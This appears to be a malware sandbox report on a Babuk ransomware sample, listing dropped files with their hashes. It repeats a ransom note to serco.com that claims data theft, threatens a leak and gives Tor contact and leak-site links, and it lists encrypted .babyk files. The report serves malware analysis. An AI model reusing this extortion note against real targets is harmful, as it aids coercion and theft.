                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.416547092842832
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlSCj2PaQHySmHJubx2IbhVfXVpv41EIcEh9ll0UxNvEEn:iCjobHH8IbhVfXVO1EhEh9ll00vtn
                                                                            MD5:B8705B9DB96A387EEFE31775C014B72E
                                                                            SHA1:9436A06101799636483D10773EF0A5ECAB3C68BC
                                                                            SHA-256:B1AA11DD5A233118C1DC2774CCE83E66812121685C4EA66A34F1CC8D233D3DF6
                                                                            SHA-512:4549C7450069EE6EFD34C4ADEC78D86CF54F3B1B1FD2CD5424116B36503E1E0FA6C6543CD7B0F4CB4462CDE09BD00094AF063AF25869A73ED367F159AE48BCF6
                                                                            Malicious:false
                                                                            Preview: ........R7....2.d&...@u...D...(.#.[...P...f9./#g5'B''0..>3.)../n.fh......x/4.....a;.m.t.wud.VG.0z./..l>,?....tZD...aT..d.9a.J....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.978821503797643
                                                                            Encrypted:false
                                                                            SSDEEP:192:NjPwWIsfYamzqTPAeL8RO6Zpphm5oiBtPiIFNbhmh:NjRQqbAdROCppM7BsIjhmh
                                                                            MD5:5FAA7D068B9F6824B80F075A4CCEC134
                                                                            SHA1:B5B197BD302DBEDF7EF7E5B24B45C07776B90A0B
                                                                            SHA-256:29C913B33CA20DE431C508D91A95641FB2DD1D39CEB15AF2A240F6D2453D877E
                                                                            SHA-512:08BA8C618E3CBCF6D1ED3387EE75B5DF3270770E4E62C634EE1150E9F408360C8D0431E70152AB4E08CBD1FA7F774542CDD5756DF2FCC0A7ABFA49AF0517B778
                                                                            Malicious:false
                                                                            Preview: .kN..>...M..8d..........I./f..JJ.....&.PW....y...v.X<...7g8z[5|.e.-....n~I.G.-.w...*.B.R...l...?.......74@...^.S.0....V|.*../.|D/iA.}...#..K..=3V...X...n.!VD.{.!0.sa....,Orj'...!n.@7..f")...z).D..GX..K.....b.`.....`E.Ek.G....Q..K.......(2j-....3{.....`....P.<..i{.v.35..m{;.._.<.E$>.y+V$.a....T..U|.I...a....Wir3.. Z..m.l..s.....{.|....4egfCD...Q....[...&.O..`..1o.(v...o.....N.....O3.s.......rW.B..Y.?...*.v....g6....Ug...j9..@.m.......3.o....v.*".$i....[]...2.?..H.H.n.M..hV...f..-q.n...{t....Vq.}..J.7?......=....p..u..j.c1..._.[Bg.`.....2..........u...m.)+..^...93.&..dO..E......\.!..Aa[.r-e.D..-9..}.u...d.s,...'.*.T.#...l..2...0b^...X.Rm:vE#;K..gn-..[.IF,(.....p!.QH[.........v....=........&..P.c......=".Vy+..... \;q...R....+GRJM..v..5.$..Z...|..Ej>rd.Y3....2.}.(0.O...Zccz3......N8..P.H...x.Y.^Dm#o=...g.......]o.U.}.>.KC.~U..iG..2...=.R7..."}xr..]....c.#..6.....\=Gr]@..C..........{..4....7."$<.>Nz}..Eu...z.........7.~I.1d....3......\.i0.<?$..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
